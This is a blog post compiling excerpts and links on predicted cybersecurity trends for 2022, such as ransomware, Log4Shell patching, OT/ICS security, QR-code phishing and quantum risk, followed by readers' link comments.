Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints.  Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year.  Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude. 
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
•  Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
•  Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
•  The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
•	AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
•	AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
•	AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.

Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
https://www.uusiteknologia.fi/2021/12/27/tammikuussa-jarjestetaan-avoin-kyberharjoitus/
Tomi Engdahl says:
https://www.epressi.com/tiedotteet/tietoturva/mita-kyberanalyytikko-tekee-kyberhyokkayksen-aikana-osallistu-avoimeen-kyberharjoitukseen-ja-kokeile.html
Tomi Engdahl says:
What the Rise in Cyber-Recon Means for Your Security Strategy
https://threatpost.com/rise-cyber-recon-security-strategy/177317/
Expect many more zero-day exploits in 2022, and cyberattacks using them being launched at a significantly higher rate, warns Aamir Lakhani, researcher at FortiGuard Labs.
As we move into 2022, bad actors are ramping up their reconnaissance efforts to ensure more successful and more impactful cyberattacks. And that means more zero-day exploits are on the horizon.
When seen through an attack chain such as the MITRE ATT&CK framework, campaigns are frequently discussed in terms of left-hand and right-hand phases of threats.
Tomi Engdahl says:
In 2022, security will be priority number one for Linux and open-source developers
Linux and open-source software will be hotter than ever, but the real changes will be in how they’re secured.
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Tomi Engdahl says:
6 things in cybersecurity we didn’t know last year
https://techcrunch.com/2021/12/29/six-things-we-learned-cybersecurity/
Tomi Engdahl says:
7 Steps for Navigating a Zero-Trust Journey
Don’t think of zero trust as a product. Think of it as “how you actually practice security.”
https://www.darkreading.com/edge-slideshows/7-steps-for-navigating-a-zero-trust-journey-
Tomi Engdahl says:
With attacks predicted to increase exponentially throughout 2022, maybe we should all think before scanning the next QR code we encounter.
How cybercriminals are taking advantage of QR Codes
https://cybernews.com/security/how-cybercriminals-are-taking-advantage-of-qr-codes/?utm_source=facebook&utm_medium=social&utm_campaign=cybernews&utm_content=post
With attacks predicted to increase exponentially throughout 2022, maybe we should all think before scanning the next QR code we encounter.
Despite eliminating the need to type a URL on your smartphone and explore new innovative ways of engagement, marketers were forced to admit defeat and retire their obsession with quick-response (QR) codes. But a decade later, the two-dimensional barcode enjoyed somewhat of a renaissance as the low-touch economy began to take shape.
From proving your vaccination status in a nightclub or large event to ordering your food in a restaurant and even connecting to a new Wi-Fi network, QR codes thrived as consumers increasingly demanded contactless convenience. It took a global pandemic for mainstream audiences to embrace QR codes.
The types of cyberthreats hiding in QR codes
Most people will have witnessed phishing attempts that trick users into clicking on nefarious links in their emails. QR code-related threats work in a similar way.
One technique is QRLjacking, and attackers use every trick in the book by leaving codes on walls, buildings, and even computer screens that direct users to a malicious site. It could be as simple as placing a sticker on a bus stop advising passengers to scan so they can download an urgent government app update.
Quishing is another method that directs unsuspecting victims to a fake version of a popular website and prompts users to enter their login details.
Another attack method involves cybercriminals setting up a free Wi-Fi network for anyone that scans the QR Code. This so-called honeypot attack enables attackers to silently steal data such as stored banking and credit card information. There are also more primitive methods, such as replacing QR codes in public places with an alternative sticker that re-directs users to harmful online content.
Tomi Engdahl says:
On the malicious use of large language models like GPT-3
https://research.nccgroup.com/2021/12/31/on-the-malicious-use-of-large-language-models-like-gpt-3/
While attacking machine learning systems is a hot topic for which attacks have begun to be demonstrated, I believe that there are a number of entirely novel, yet-unexplored attack-types and security risks that are specific to large language models (LMs). That may be intrinsically dependent upon things like large LMs’ unprecedented scale and the massive corpus of source code and vulnerability databases within their underlying training data. This blogpost explores the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposes an offensive security research agenda for large language models. based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including
code) by large language models including GPT-3.
Tomi Engdahl says:
Facial Recognition For Covid-19 Tracking In Seoul
https://hackaday.com/2021/12/31/facial-recognition-for-covid-19-tracking-in-seoul/
The city of Bucheon, population 830,000, is a satellite city southwest of Seoul and part of the greater metropolitan area and the site of a pilot program to apply AI facial recognition and tracking technologies to aid Covid-19 epidemiological investigators. South Korea has been generally praised for its rapid response to coronavirus patient tracking since the beginning of the outbreak. People entering public facilities enter their information on a roster or scan a QR code. Epidemiologists tracking outbreaks use a variety of data available to them, including these logs, electronic transaction data, mobile phone location logs, CCTV footage, and interviews. But the workload can be overwhelming, and there are only a fixed number of workers with the required training available, despite efforts to hire more.
https://www.reuters.com/world/asia-pacific/skorea-test-ai-powered-facial-recognition-track-covid-19-cases-2021-12-13/
Tomi Engdahl says:
A New Year Will Bring New Targets: What to Look for in 2022
https://www.securityweek.com/new-year-will-bring-new-targets-what-look-2022
Tomi Engdahl says:
What to Expect in 2022: Microservices Will Bring Macro Threats
https://www.securityweek.com/what-expect-2022-microservices-will-bring-macro-threats
If not addressed in design and deployment, the risks with microservices can multiply since any application could be composed of hundreds of microservices
Each microservice needs to expose its own set of APIs, communication methods and entry/exit points to be viable – and each of these carries a level of risk.
Secure Application Containers
Ensure Data is Protected
Reduce Access Points with an API Gateway
Use Rate Limits
Adopt Defense-in-Depth as a Strategy
Monitor and Update
Microservices are the future for cloud-based application development. The flexibility and scale allow organizations to grow on-demand and ensure that the best possible customer/service user-experience is always provided. The risks with microservices are not all that different than the risks with normal applications. Still, if not addressed in design and deployment, these risks can multiply massively since any application could be composed of hundreds of microservices.
Consider security at every stage of the design and deployment to ensure a robust security posture for your deployment.
Tomi Engdahl says:
TILAAJALLE: “Eihän tässä internet syttynytkään tuleen” Tästä on kyse laajassa ohjelmistohaavoittuvuudessa, ja tätä se uhrilta vaatii
https://www.kauppalehti.fi/uutiset/eihan-tassa-internet-syttynytkaan-tuleen-tasta-on-kyse-laajassa-ohjelmistohaavoittuvuudessa-ja-tata-se-uhrilta-vaatii/a1222673-13a4-4226-bddd-bcacaae44f92
Internetpalveluissa laajasti käytetyn, haavoittuvan Apache log4j
- -ohjelmiston hyväksikäyttötapauksia on havaittu myös Suomessa.
Haavoittuvuus tuli julki 10. joulukuuta, ja se on vaikuttanut organisaatioihin ympäri maailman. Rikolliset pyrkivät vikaa hyödyntämällä tunkeutumaan organisaatioiden, esimerkiksi yritysten, järjestelmiin. Vian vuoksi hyökkääjän on mahdollista suorittaa palvelimelle mielivaltaisia komentoja etänä. Tapauksen todellinen vakavuus ei ehkä selviä ikinä, sillä järjestelmiin on mahdollista kylvää myös viiveellä aktivoituvia haittoja. Käyttäjäorganisaation on ennen kaikkea selvitettävä, onko haavoittuvuus osunut omaan sovelluskantaan. Paras tapa on olla yhteydessä ohjelmiston toimittajaan.
Tomi Engdahl says:
Quantum Computing Is for Tomorrow, But Quantum-Related Risk Is Here Today
https://www.securityweek.com/quantum-computing-tomorrow-quantum-related-risk-here-today
Booz Allen Hamilton has analyzed the quantum computing arms race to determine China’s current and future capabilities, and to understand the likely use of China’s cyber capabilities within that race. It concludes, “Risk management must start now.”
The report is really in two halves. The first describes the cybersecurity threat inherent in the quantum arms race, while the second is a primer on the complexities of quantum computing. While this is worth reading, only the cybersecurity threats are relevant to us here.
The two cybersecurity threats
Theft of quantum-relevant research
Quantum decryption
The state of quantum and the threats today
There is, however, little that is new in the Booz Allen analysis – except, perhaps, a suggestion that the threat is not as pressing as some people argue. The report states, “Many of quantum computing’s improvements over classical computers… are unlikely to be demonstrated for at least a decade.” This is a big unknown – nobody knows how long it will be before limited use quantum computing becomes a reality.
Booz Allen recommendations
The report makes only three primary recommendations to counter the quantum-related threats from China. The first is to use threat modeling to assess changes to organizational risks based on a better understanding of what China wants and why it wants it.
“Organizations are constantly challenged to stay ahead of attackers. While the application of quantum computing may be several years away, if and when it does become a part of the threat landscape it will put additional pressure on cybersecurity teams to minimize risks that can be exploited,” says Yaniv Bar-Dayan, CEO & co-founder at Vulcan Cyber. “Booz Allen appropriately recommends that organizations use threat modeling to assess how their risk will change and develop associated strategies for mitigating that risk.”
The second recommendation is to develop an organizational strategy for deploying post-quantum (that is, quantum proof) encryption. This really should be done as soon as possible. Chinese threat actors are not waiting for the ability to decrypt data, they are stealing it now for decryption later.
“The computational ability of quantum computers poses a high risk to public-key algorithms, and it may allow nation-state threat actors to break asymmetric cryptography efficiently,” comments Ivan Righi, cyber threat intelligence analyst at Digital Shadows. “This may enable nation-state actors to eavesdrop on communications, intercept private keys, and steal data.”
The third is more general purpose – educate staff and keep informed about the state of quantum development and the risks that come from it. “The arms race to quantum computing ushers in a new era of competitive advantage and cyber risk,” says Rajiv Pimplaskar, CRO at Veridium. “CISOs, IT and business leaders should be acutely mindful of this risk.”
Tomi Engdahl says:
IoT’s Importance is Growing Rapidly, But Its Security Is Still Weak
https://www.securityweek.com/iots-importance-growing-rapidly-its-security-still-weak
The explosive growth of IoT devices opens an extensive attack surface that needs to be addressed
The weakest link in most digital networks is the person sitting in front of the screen – the defining feature of the Internet of People (IoP). Because that’s where, through cunning and manipulative tactics, unsuspecting recipients can be tricked into opening toxic links. Little do they know, however, they’ve unwittingly opened the gates to digital catastrophe.
Tomi Engdahl says:
How combining human expertise and AI can stop cyberattacks
https://lm.facebook.com/l.php?u=https%3A%2F%2Fventurebeat.com%2F2022%2F01%2F03%2Fhow-combining-human-expertise-and-ai-stop-cyberattacks%2F&h=AT3Ua_hdPsqCjUuSiRx15X9ynhUSbiEgjgW3jmacH84Ex6FpmvTNCZyrsyM0xYL6e1089deOFdv5AebOfkdMTK5QGn41p-kbFNhdFxN2x5zgFeE5Q6ODw9iuuQPAyquPybpXuZZSm8z4hGWOsQ
Chief information security officers’ (CISOs) greatest challenge going into 2022 is countering the speed and severity of cyberattacks. The latest real-time monitoring and detection technologies improve the odds of thwarting an attack but aren’t foolproof. CISOs tell VentureBeat that bad actors avoid detection with first-line monitoring systems by modifying attacks on the fly. That’s cause for concern, especially with CISOs in financial services and health care.
Even the most advanced AI and machine learning-based threat monitoring and response systems need time to interpret, learn, and defend against new attack patterns. Structured machine learning algorithms that rely on convolutional neural networks help reduce the latencies. However, bad actors are improvising attack techniques faster than AI and ML techniques can react.
Tomi Engdahl says:
Gartner Predicts By 2025 Cyber Attackers Will Have Weaponized Operational Technology Environments to Successfully Harm or Kill Humans
Organizations Can Reduce Risk by Implementing a Security Control Framework
https://www.gartner.com/en/newsroom/press-releases/2021-07-21-gartner-predicts-by-2025-cyber-attackers-will-have-we
Tomi Engdahl says:
Autonomous “Slaughterbots” Could Soon Be Used By Drug Cartels, Warns MIT Professor
https://www.iflscience.com/technology/autonomous-slaughterbots-could-soon-be-used-by-drug-cartels-warns-mit-professor/
In a recent interview with The Next Web, MIT Professor and founder of the Future of Life Institute Max Tegmark has made some dire predictions about the future uses of militarized robots, and the ideas paint a grim picture of future warfare. Talking about small, weaponized, autonomous drones and robots, Tegmark suggests that once “slaughterbots” are fully developed by the military, it is only a matter of time before civilians can get their hands on them, as they do with so many other weapons. In the wrong hands – such as drug cartels – these bots will open a gateway of cheap and almost unstoppable targeted assassinations onto whoever they choose, he said, adding that governments need to step in now before that dystopian scenario becomes reality.
“If you can buy slaughterbots for the same price as an AK-47, that’s much preferable for drug cartels, because you’re not going to get caught anymore when you kill someone,”
‘Slaughterbots’ are a step away from your neighborhood — and we need a ban
Lethal autonomous weapons are becoming a reality
https://thenextweb.com/news/slaughterbots-are-a-step-away-from-your-neighborhood-and-we-need-a-ban
Tomi Engdahl says:
Connecting the dots on diversity in cybersecurity recruitment
https://techcrunch.com/2022/01/03/connecting-the-dots-on-diversity-in-cybersecurity-recruitment/?tpcc=tcplusfacebook
Connecting the dots on diversity in cybersecurity recruitment
Mandy Andress
@elastic / 1:22 AM GMT+2•January 4, 2022
Image of people standing on a gray surface amid yellow dots.
Image Credits: gremlin (opens in a new window)/ Getty Images
Mandy Andress
Contributor
Mandy Andress is the chief information security officer at Elastic, an enterprise search company, and has more than 25 years of experience in information risk management and security.
More posts by this contributor
Pushing for an ‘apolitical’ workplace is immoral (and unrealistic)
Critical thinking and problem-solving are considered vital attributes for the cybersecurity professional — so it’s time our industry applied those capabilities to connect the dots between the skills shortage and lack of diversity.
There’s no question that recruiting talent in sufficient numbers right now is a growing challenge — but it’s one that I believe a more inclusive talent pipeline would help to alleviate.
In its Cybersecurity Workforce Study 2021, industry body (ISC)2 found that 2.7 million information security jobs remain unfilled worldwide. While this number is down from 3.1 million in 2020, we’re a long way from where we need to be. In the face of increased digitization and a rising tide of attacks, the current cybersecurity workforce of 4.2 million people globally needs to grow 65% to keep up with the demand for its skills.
Tomi Engdahl says:
Predictions: SecurityWeek’s 2022 Cybersecurity Outlook
https://www.securityweek.com/predictions-securityweeks-2022-cybersecurity-outlook
Members of the SecurityWeek editorial team look into their crystal balls and make some bold predictions about the big cybersecurity stories that will dominate the headlines in 2022. Our predictions cover the range of issues plaguing cybersecurity, including ransomware extortion attacks, software supply chain weaknesses, ICS security, geopolitics, IoT and privacy.
Editor-at-Large Ryan Naraine on nation-state APTs, software supply chain security and the hackers-for-hire industry:
Ransomware slows – Major ransomware outbreaks will slowly subside as companies beef up defenses and counter-operations by global law enforcement disrupt and (partially) disable the high-profile gangs. In 2022, security leaders will continue to prioritize the basics (properly tested backups, patching, multi-factor authentication and secure cloud deployments) to reduce exposure to ransomware extortion, making it more of a nuisance than a national security threat.
Supply chain mega-hacks – Even as ransomware attacks subside, the extent of the software supply chain weaknesses will come into sharper focus. Expect a few more SolarWinds-type supply chain mega-hacks to dominate the headlines
The hacker-for-hire industry – A big story this year will be the continued outing of PSOAs (private sector offensive actors) supplying exploits and hacking tools to governments around the world.
Iran and North Korea financial malware – Government-backed hackers linked to North Korea and Iran will aggressively target poorly protected organizations with malware capable of siphoning billions of dollars from crypto-banks and financial institutions.
China’s zero-day factory – The scale of China’s offensive cyber capabilities will be front and center in 2022 as new zero-day disclosure rules take effect and Chinese hackers continue to show off technical brilliance at exploiting the most modern software products.
Malware below the OS – We will soon start to see a steady flow of malware discoveries below the operating system, specifically rootkits and bootkits targeting flaws in UEFI firmware.
The great resignation in cyber – Weary and overworked from all the major cybersecurity crises, skilled practitioners will continue to resign en-masse, leaving security programs struggling to fill important positions. The lingering exhaustion from the SolarWinds/Kaseya/Log4j incidents, combined with pandemic-induced anxieties, will cause the ‘great resignation’ to hit harder as director-level staff join the exodus. By the end of 2022, the cybersecurity skills shortage will reach critical levels with no real relief in sight.
Eduard Kovacs on industry trends and OT/ICS security:
VC funding frenzy – 2022 will be another record-breaking year in terms of venture capital funding for startups solving cybersecurity problems.
M&A activity – The volume of mergers and acquisitions will remain steady – roughly 400 cybersecurity-related deals will be announced in 2022.
Targeting the power sector – Electric utilities will continue to be targeted by ransomware and some will suffer significant disruptions, mostly on the IT side.
OT breaches – Some manufacturers will publicly admit that production has been disrupted due to a breach in the OT network, which is increasingly connected to the IT network and even the internet.
Industrial control system vulnerabilities – The number of ICS vulnerabilities discovered by vendors and researchers will continue to increase and it will exceed 1,000 in 2022.
Kevin Townsend on geopolitics, privacy, tokenization:
Geopolitics – There is already a global cyberwar.
Mobile Internet of Things – IoT devices are increasingly used in vehicles: cars, transporters, aircraft, drones and satellites. These vehicles will become attractive targets. Compromise could be catastrophic. Extortion could be the motivation.
Privacy – Governments legislate for privacy to please the voters.
